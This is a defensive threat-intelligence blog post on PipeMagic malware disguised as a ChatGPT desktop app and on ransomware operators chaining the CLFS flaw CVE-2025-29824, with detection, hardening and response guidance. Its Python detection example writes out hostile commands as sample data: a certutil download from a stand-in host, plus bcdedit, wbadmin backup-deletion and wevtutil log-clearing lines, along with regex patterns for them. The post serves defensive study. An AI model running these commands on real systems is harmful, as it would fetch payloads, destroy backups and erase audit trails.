PipeMagic Malware Masquerades as ChatGPT: Windows Vulnerability Exploited for Ransomware

Fake “ChatGPT Desktop” app drops PipeMagic backdoor; Storm‑2460 chains CLFS zero‑day (CVE‑2025‑29824) to deploy ransomware. Detection.

Image: A futuristic desktop window labeled "ChatGPT" with a ghosted warning icon, an overlay of code, named-pipe glyphs, and a CLFS chip motif

Breaking Brief

  • A counterfeit “ChatGPT Desktop” app is delivering PipeMagic, a modular backdoor used by the financially motivated group Storm‑2460; the campaign chains a Windows CLFS zero‑day (CVE‑2025‑29824) for privilege escalation and culminates in ransomware deployment. Victims span IT, finance, and real estate across the U.S., Europe, South America, and the Middle East. [microsoft+1]

  • Delivery uses compromised legitimate sites, certutil‑based downloads, and malicious MSBuild projects to reflectively load PipeMagic in memory before exploiting CLFS to elevate privileges, delete backups, and prepare encryption. [logpoint+1]

Technical Deep Dive

  • Loader and disguise: Attackers fork a legitimate open‑source ChatGPT desktop project, injecting code to decrypt and run an in‑memory dropper that launches PipeMagic without an obvious UI (blank‑app decoy variants seen since 2024). [securityaffairs+1]

  • Backdoor architecture: PipeMagic communicates with its C2 over TCP, then loads additional modules through encrypted named pipes, organizing them in in‑memory doubly linked lists for staging, execution, and comms; this keeps on‑disk artifacts to a minimum. [thehackernews+1]

  • Exploit chain: certutil fetches a malicious MSBuild file from a compromised site; the file decrypts a payload via callback tricks (e.g., EnumCalendarInfoA), starts PipeMagic, then triggers CLFS EoP (CVE‑2025‑29824) ahead of the ransomware launch. [logpoint+1]

  • Post‑EoP actions: LSASS dumping, backup deletion (wbadmin), BCD tampering to disable recovery, and log wiping (wevtutil), indicating a playbook for high‑impact encryption at scale. [logpoint]

AI‑Themed Social Engineering Trends

  • Brand abuse: Fake AI apps (ChatGPT desktop clients) serve as high‑trust lures; projects are cloned from GitHub and malvertised, with installers trojanized to drop loaders/backdoors. [securityaffairs+1]

  • ClickFix‑style flows: Users are steered via malvertising or compromised sites to “fix” prompts that silently load malicious installers, in line with recent social engineering patterns. [intruceptlabs+1]

Detection Guide

  • Endpoint telemetry

    • Flag certutil network calls pulling MSBuild projects from unusual domains; correlate with msbuild.exe launching outside a developer workflow. [microsoft+1]

    • Hunt for creation/use of random named pipes matching the \\.\pipe\1.<hex> pattern, followed by outbound TCP sessions to rare hosts. [thehackernews]

    • Detect BCD edits, wbadmin backup deletions, and wevtutil log clears within the same session; this is the classic ransomware prep sequence. [logpoint]

  • Network/SWG

    • Block newly observed domains hosting “ChatGPT desktop” installers; inspect MSBuild payload downloads from compromised legitimate sites. [intruceptlabs+1]

    • Alert on anomalous TCP C2 beacons from endpoints that recently executed ChatGPT‑themed installers. [thehackernews]
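The three endpoint hunts above, written out as an added example that is not part of the original post: it runs over constructed Sysmon‑style events (pipe creation and process creation), flags PipeMagic‑pattern pipe names, certutil pulls of MSBuild project files, and the bcdedit/wbadmin/wevtutil trio when all three land in one logon session. The event shape, logon ids, and the example.invalid host are assumptions for illustration.

```python
import re
from collections import defaultdict

# Constructed Sysmon-like events (not real telemetry). Event ID 17 = pipe
# created (has "pipe"), Event ID 1 = process created (has "cmd"). "logon"
# groups events belonging to one logon session.
EVENTS = [
    {"id": 17, "logon": "0x3e7a", "pipe": r"\\.\pipe\1.a1b2c3d4e5f6"},
    {"id": 17, "logon": "0x3e7a", "pipe": r"\\.\pipe\lsass"},
    {"id": 1, "logon": "0x3e7a", "cmd": "certutil.exe -urlcache -f http://example.invalid/build.proj C:\\Users\\Public\\build.proj"},
    {"id": 1, "logon": "0x3e7a", "cmd": "msbuild.exe C:\\Users\\Public\\build.proj"},
    {"id": 1, "logon": "0x3e7a", "cmd": "bcdedit /set {default} recoveryenabled no"},
    {"id": 1, "logon": "0x3e7a", "cmd": "wbadmin delete catalog -quiet"},
    {"id": 1, "logon": "0x3e7a", "cmd": "wevtutil cl Security"},
    {"id": 1, "logon": "0x5c10", "cmd": "wevtutil cl Application"},  # benign-looking on its own
]

# \\.\pipe\1.<hex>: the PipeMagic naming pattern quoted in the post.
PIPE_RE = re.compile(r"^\\\\\.\\pipe\\1\.[0-9a-fA-F]{8,}$")
# certutil used as a downloader for an MSBuild project file.
CERTUTIL_RE = re.compile(r"certutil(\.exe)?\s.*-urlcache.*\.(proj|csproj|xml)\b", re.I)
# Ransomware preparation steps; all three must occur in the same session to fire.
PREP = {
    "bcd": re.compile(r"\bbcdedit\b.*(recoveryenabled\s+no|bootstatuspolicy\s+ignoreallfailures)", re.I),
    "wbadmin": re.compile(r"\bwbadmin\b.*\bdelete\b", re.I),
    "wevtutil": re.compile(r"\bwevtutil(\.exe)?\s+cl\b", re.I),
}

def find_pipemagic_pipes(events):
    """Pipe names matching the \\\\.\\pipe\\1.<hex> pattern."""
    return [e["pipe"] for e in events if e["id"] == 17 and PIPE_RE.match(e["pipe"])]

def find_certutil_msbuild(events):
    """Command lines where certutil fetched an MSBuild project file."""
    return [e["cmd"] for e in events if e["id"] == 1 and CERTUTIL_RE.search(e["cmd"])]

def find_ransomware_prep(events):
    """Logon sessions in which bcdedit, wbadmin delete and wevtutil cl all appear."""
    seen = defaultdict(set)
    for e in events:
        if e["id"] != 1:
            continue
        for name, rx in PREP.items():
            if rx.search(e["cmd"]):
                seen[e["logon"]].add(name)
    return sorted(logon for logon, names in seen.items() if names == set(PREP))

if __name__ == "__main__":
    print("pipes:", find_pipemagic_pipes(EVENTS))
    print("certutil->msbuild:", find_certutil_msbuild(EVENTS))
    print("prep sessions:", find_ransomware_prep(EVENTS))
```

Session 0x5c10 clears a log but never touches BCD or backups, so it is not flagged; the sequence rule is what keeps an isolated wevtutil run from paging anyone.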

Windows Hardening and Immediate Mitigations

  • Patch CLFS: Ensure the April 2025 (and later) updates that fix CVE‑2025‑29824 are deployed on all Windows endpoints; prioritize admin workstations and servers. [microsoft+1]

  • Constrain LOLBINs: Block or restrict certutil and MSBuild on non‑developer machines via AppLocker/WDAC; enable ASR rules for Office/Mscript abuse and block process creations from PSExec/WMI if not required. [logpoint]

  • EDR controls: Turn on memory scanning and named‑pipe monitoring; add detections for EnumCalendarInfoA‑based loaders and reflective PE injection patterns. [thehackernews+1]

  • Software allowlisting: Only permit signed and verified installers; require code‑signed updates for any “ChatGPT desktop” tool; prefer official store or vendor channels. [securityaffairs]

ChatGPT App Verification Guide (for users)

  • Source of truth: Download only from the official publisher site or verified app stores; avoid “free enhanced ChatGPT desktop” links from ads or forums. [securityaffairs]

  • Signature check: Verify the digital signature and publisher; hash‑check installers and compare against known‑good releases. [securityaffairs]

  • Behavior red flags: A blank UI, unexpected admin prompts, or background network activity while idle are indicators to quarantine and report. [securityaffairs]

Incident Response Procedures

  • Contain: Isolate affected hosts; block egress to suspicious C2; preserve volatile memory to capture in‑memory modules and named‑pipe indicators. [logpoint+1]

  • Eradicate: Remove persistence, rotate credentials, and reimage if LSASS dumping or backup deletions are confirmed; restore from known‑good backups after validating BCD and event log integrity. [logpoint]

  • Recover and monitor: Re‑enable recovery options, validate backups, and deploy detections for PipeMagic pipe naming and MSBuild reflective loaders across the fleet. [thehackernews+1]


Hey there! I’m Alfaiz, a 21-year-old tech enthusiast from Mumbai. With a BCA in Cybersecurity, CEH, and OSCP certifications, I’m passionate about SEO, digital marketing, and coding (mastered four languages!). When I’m not diving into Data Science or AI, you’ll find me gaming on GTA 5 or BGMI. Follow me on Instagram (@alfaiznova, 12k followers, blue-tick!) for more. I also run https://www.alfaiznova.in for gadget comparisons and the latest information about gadgets. Let’s explore tech together!